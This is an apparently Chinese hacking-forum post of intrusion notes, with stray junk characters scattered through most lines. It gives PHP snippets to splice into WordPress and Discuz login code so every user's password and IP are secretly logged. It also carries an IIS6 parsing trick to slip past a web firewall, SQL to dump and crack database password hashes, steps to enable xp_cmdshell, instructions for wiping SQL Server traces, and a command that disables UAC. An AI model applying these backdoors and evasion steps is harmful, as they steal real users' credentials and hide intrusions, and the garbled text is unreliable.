$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;' o, {7 V9 g' b) U4 A7 `
$txt=$txt.”\r\n”;
$ x! B9 z/ B  j3 m' X7 x& j. [if($log_user&&$log_pwd&&$log_ip){
8 [+ L* o) l2 E  J8 M& S@fwrite(fopen(‘pwd.txt’,”a+”),$txt);. y% J$ v0 n" e- Y) v- b2 M
}
  f' D% S' R! x7 b4 r* X1 j; a当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
$ C7 P3 K3 n$ E4 }1 |就是搜索case ‘login’" d" `: ~; h  {& `5 \& b; `
在它下面直接插入即可,记录的密码生成在pwd.txt中,
! V% d, v4 H& [8 G* A其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录) s7 U/ e& O9 {: i8 L
利用II6文件解析漏洞绕过安全狗代码:6 j5 [" }0 A6 s9 _
;antian365.asp;antian365.jpg
  x! B" w7 m+ n
5 T9 \5 q2 F  p! k各种类型数据库抓HASH破解最高权限密码!
7 m; g$ K% B; h9 I  p6 B1.sql server2000
7 F' V2 _; [3 n1 C+ sSELECT password from master.dbo.sysxlogins where name='sa'/ I. F5 B# r* |' ~0 [
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
6 X& Y1 P! R5 Z2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
+ J8 D* X9 @4 F7 {0 U; V' M, M$ p7 D6 O# W; N. S
0×0100- constant header
6 C. s- {* u* f4 t. f% @7 n) O7 y34767D5C- salt
) N/ G  x4 O; `; W2 X0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash; I# O. ~; P! Q9 R* _% O
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
$ P# d8 s* v; qcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
! @# `4 Z3 \9 t+ Y" d( ZSQL server 2005:-  R& u9 g! N' z( w
SELECT password_hash FROM sys.sql_logins where name='sa'7 j1 k% b# u% J, t9 `" l; L- Q
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
/ _0 J, r0 x) Q6 }  q9 V1 i0×0100- constant header
0 Y. c* f5 j+ u! ^993BF231-salt
/ Z- x0 R0 s7 F  ^% |5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
7 @6 Y; `0 H3 I# [( B' w8 f1 |( {  |0 ncrack case sensitive hash in cain, try brute force and dictionary based attacks.
; P3 T. ^" ^: e% t* E( v  N) U; Z! ~- p3 U1 x% z0 m$ m. t* F& f: K
update:- following bernardo’s comments:-# u+ i1 j% ~0 w2 `' W8 R
use function fn_varbintohexstr() to cast password in a hex string.
5 A8 P2 g1 W$ n& W( j6 Z" Ae.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
8 `! g2 p! Z) L. Z/ Q( d3 M9 V& a, g4 Z
MYSQL:-
* S$ z, W, P5 ?+ H' S+ t" ]' S9 D0 {0 N
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.! {; }" t9 k, W
+ l2 i. P. {; n3 u. \+ W
*mysql  < 4.18 i6 T& ]9 s8 ~) g) o

, t+ ~* N5 Y9 g$ V: pmysql> SELECT PASSWORD(‘mypass’);5 U& Q" q+ b& z# C$ k; N
+——————–+
! q& x3 T5 L% V% T| PASSWORD(‘mypass’) |. h; t2 x, {. Y8 \0 p
+——————–+( U1 o& u3 R0 x& n. b9 }+ @* ]2 k
| 6f8c114b58f2ce9e   |5 q. P* @1 x, }1 Q+ m: j
+——————–+- ^, j& K# q8 X' T7 O- u, m+ T3 o
; ^8 x, P) C, ]8 O9 z8 O
*mysql >=4.1, K0 b! [. y' l) y* Y

+ s, `1 @0 B1 k6 U$ N" [mysql> SELECT PASSWORD(‘mypass’);
- {) v* ?) W% t1 I$ K9 {4 l+——————————————-+
- K2 z2 m+ G9 i+ v( ?+ F$ M% G7 r| PASSWORD(‘mypass’)                        |* {; s  {# @% q" |% [, c, d
+——————————————-+
1 Y# G: a6 h4 }$ L' `| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
3 ^3 k. \3 H& ^$ w" ?0 Y1 t+——————————————-+! C( j3 I* T$ h: B! c$ O9 M- m* H

% A/ [8 |5 n* D- v4 Y; WSelect user, password from mysql.user$ ~! t( u* p$ |, m" m7 v- x
The hashes can be cracked in ‘cain and abel’: R, W) X& k( F: E1 ~9 @7 F
. d4 W7 @& H0 m% Y% ^. v* S
Postgres:-, ]' ]2 i+ f% V. b  V6 ^! e
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)3 G5 G8 K9 ~7 _, u0 [" m# Q
select usename, passwd from pg_shadow;, A7 r2 ^; a4 E2 ~* E
usename      |  passwd. P' }1 [- _4 }' m$ K$ H6 K
——————+————————————-) C2 @; `# a8 j# }9 L# |4 ^
testuser            | md5fabb6d7172aadfda4753bf0507ed4396
  x% l; l+ ~5 X5 r# y% e9 ]/ \use mdcrack to crack these hashes:-
& {" q' W9 S8 }8 E$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396. O7 A& D/ n  q: W' x1 M. K8 T3 k
2 \, u* ?* L- t3 p
Oracle:-
7 U* a, ]. N8 V2 v4 b/ d- cselect name, password, spare4 from sys.user$: U3 B- A  G* f% P8 R
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g9 P, B  G3 R( S: ^! H0 }) P' |0 h
More on Oracle later, i am a bit bored….5 d. T! v* M7 k* D
# u- A% P4 ?8 ]# d: L
6 D) }8 D" s' j7 F8 @
在sql server2005/2008中开启xp_cmdshell
& n' a6 T/ c8 K  f# E-- To allow advanced options to be changed.8 J* Z# b. |7 ?! {2 N  x2 L) }
EXEC sp_configure 'show advanced options', 1. V5 S4 ^5 p, |6 m! |- W
GO0 I7 r9 g/ j+ u- I" F
-- To update the currently configured value for advanced options.
' T' f$ t' S  ZRECONFIGURE- L1 |) F+ o5 [% y. W3 O
GO/ ~. \- C0 s) ~) r% b) h
-- To enable the feature.
) M* S4 Z7 H: D2 b* R& u1 iEXEC sp_configure 'xp_cmdshell', 1
0 l  p$ |8 X2 w& a. M" {GO6 n: L' p; ~. h1 M  `; {% H
-- To update the currently configured value for this feature.; F+ B5 b! e8 X' U0 A+ S
RECONFIGURE2 p4 h: R* t7 z
GO
- B! e# O$ j4 u, Y: sSQL 2008 server日志清除,在清楚前一定要备份。) b, v: V0 D: a3 R7 U: P/ D
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:1 F" Y  S* r2 D# t8 s% o
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin; k3 _* s0 h. q* Q) l6 _

2 [6 W$ d/ L1 q2 f$ ?对于SQL Server 2008以前的版本:/ B  v! q6 f* z$ k. P( L
SQL Server 2005:6 r, Y2 V6 T  \7 s4 `
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
2 n4 S" F6 {+ i+ ^9 J0 GSQL Server 2000:
- Z3 A6 n, K, @1 n3 A( X: a/ u* `: n5 l清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
- O6 b' O. J  V; x- p  c; E# Y' A7 t, r/ p; L- ?
本帖最后由 simeon 于 2013-1-3 09:51 编辑+ M6 F! f+ R- a# o- q. ~+ ]9 o

9 B0 K: w/ c, `
% V; e+ @# {. ?windows 2008 文件权限修改- F. _  ?( L5 k7 R' Z5 u& [; y7 x+ O
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
7 K- v9 A) k( E4 v+ R4 `2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
6 S) H* W9 u# v- W2 c  d7 U一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
' ^, B& C* x! {) D
5 t+ [0 W4 Y4 zWindows Registry Editor Version 5.00; F# W3 q. Z' J/ f0 R
[HKEY_CLASSES_ROOT\*\shell\runas]
6 u: H! k# r6 r7 P% E  I2 x, x@="管理员取得所有权"
. H5 y% @) ^% `4 Q& s# d"NoWorkingDirectory"=""
5 |6 L. c0 p0 _' S" \0 }[HKEY_CLASSES_ROOT\*\shell\runas\command]
1 z7 n8 j* i- H8 k2 `. H@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
' J$ R: K, T; ?% |- _, W6 q8 Z"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ E0 {9 G4 w4 l! W' m" \
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
2 i9 a$ |7 }8 h# ]  _& M@="管理员取得所有权"
0 L9 Q- b5 Z, x. N' g"NoWorkingDirectory"=""( e  ~+ G5 W& k9 m8 i% x
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]# V' ^" H  s! ]: @* q3 j
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
$ |4 B. Q, I4 w- y"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 x+ d9 p' Q( K

& l2 K4 E$ ^7 K: ^$ V, i[HKEY_CLASSES_ROOT\Directory\shell\runas]8 V9 b1 o9 L! k* D' ^0 o
@="管理员取得所有权") g" e, N3 m/ v5 V+ s$ V" S7 k* ?$ T8 `
"NoWorkingDirectory"="") [2 ?& _' B, Q4 V
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
9 d" y1 y2 Y5 O( T; e9 W: L@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"" Q9 l& Z+ a" N" ]: T  m
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"8 N, _7 ^( H/ l4 P
5 c0 ?* Z, T& V5 c* x, |, S
  G' r0 F$ f, m
win7右键“管理员取得所有权”.reg导入0 t/ O' t! t& j4 m% J9 G+ _& S! ~$ ?
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
1 a3 o/ C# [7 C9 M9 a1、C:\Windows这个路径的“notepad.exe”不需要替换
+ D/ y! f$ W* P2、C:\Windows\System32这个路径的“notepad.exe”不需要替换7 N4 A# I# m- J6 Y# P" c3 r9 P
3、四个“notepad.exe.mui”不要管
) I) V( d; S1 M9 ~9 d4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和. f' O* i! N, B1 M6 S+ q% g
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
2 p* Z  A# M% s3 w替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,! K! t( t& K3 O+ P- m
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。+ J4 p, ~  v  y) n* u8 k
windows 2008中关闭安全策略: ! F5 ^$ M/ t. A& c0 H: e' F- s
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f* k% o7 r5 b, L2 [- ?
修改uc_client目录下的client.php 在
$ L& w, w! P2 x: Bfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
, a. U9 Z: b7 e/ F* g/ Q下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
" ]9 Y! `: o! _+ E4 k( h$ E0 v; m6 L你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
4 B6 Q# Q2 N9 i1 C2 kif(getenv('HTTP_CLIENT_IP')) {
" ^" C0 X/ k* o1 s0 y$onlineip = getenv('HTTP_CLIENT_IP');0 f- `+ L; g, b( ~/ C
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$ n3 ~. G1 Y9 C+ U! w! c$onlineip = getenv('HTTP_X_FORWARDED_FOR');7 Y) m8 V1 b" `
} elseif(getenv('REMOTE_ADDR')) {
- L/ R" l+ r; F. R0 M- m$ z  P- l1 w2 G$onlineip = getenv('REMOTE_ADDR');" r+ y( V- ~" X- u
} else {
( W, ^6 Z# P  }$ z' [$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
; Z, e: _7 L( j- B3 H' o- W}, G2 }( C8 g: Q+ d- T/ v* s
     $showtime=date("Y-m-d H:i:s");( P( ?6 D; p  {, d' @. S5 w
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";9 R  F; o& g2 D( S, C
    $handle=fopen('./data/cache/csslog.php','a+');
( l  w8 a* M$ U. j    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2